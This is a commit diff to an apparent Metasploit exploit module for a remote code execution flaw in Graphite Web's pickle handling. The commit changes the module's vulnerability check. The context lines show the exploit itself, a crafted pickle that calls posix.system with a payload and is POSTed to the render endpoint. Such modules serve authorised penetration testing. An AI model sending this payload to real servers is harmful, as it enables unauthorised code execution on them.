Fix check method
parent
533d98bd1b
commit
42f774a064
|
@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Graphite Web Unsafe Pickle Handling',
|
||||
'Description' => %q{
|
||||
This module exploits a remote code execution vulnerability in the
|
||||
pickle handling of the rendering code in the Graphite Web project between
|
||||
version 0.9.5 and 0.9.10(both included).
|
||||
This module exploits a remote code execution vulnerability in the pickle
|
||||
handling of the rendering code in the Graphite Web project between version
|
||||
0.9.5 and 0.9.10(both included).
|
||||
},
|
||||
'Author' =>
|
||||
'Author' =>
|
||||
[
|
||||
'Charlie Eriksen' # Initial discovery and exploit
|
||||
],
|
||||
|
@ -60,19 +60,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'POST'
|
||||
})
|
||||
|
||||
if response.code != 200
|
||||
return Exploit::CheckCode::Appears
|
||||
if response and response.code == 500
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
data = "line\ncposix\nsystem\np1\n(S'#{payload.encoded}'\np2\ntp3\nRp4\n."
|
||||
|
||||
print_status("Sending exploit payload...")
|
||||
|
||||
response = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'render', 'local'),
|
||||
'method' => 'POST',
|
||||
'data' => data
|
||||
})
|
||||
print_status("Sent exploit payload")
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue